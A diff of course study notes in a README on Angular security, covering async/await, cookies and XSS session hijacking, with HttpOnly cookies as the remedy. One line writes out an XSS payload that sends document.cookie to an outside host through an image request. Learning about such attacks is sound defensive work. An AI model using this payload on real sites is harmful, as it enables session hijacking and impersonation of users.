CodeAlpesh/angular/angular-security-course/1-signup/README.md

         * await is equivalent to .then()
         * error can be handles by try/catch or using catch with async function call.
         * callback will have (err, result) ... format
+    * Issues with cookie:
+        * Cookies are kind of storage mechanism.
+Can store user preferences etc.
+        * XSS - Cross Site Scripting attack - Can be hijacked by malicious code and session can be hijacked.
+            * Attacker can impersonate user.
+            * Image tag can load image from another server - attach session id to very small image ...
+            * Comments ... which are not sanitized of HTML tags new Image().src="http://host.com/somepath=" + document.cookie;
+            * Solution - Mark cookies HttpOnly. - Will not be accesible to javascript ...
+Browser anyway is handling it automatically

     * Create Session(sessionid, user, expriesAt/validUntil)
     * Create SessionStore - SessionID - Session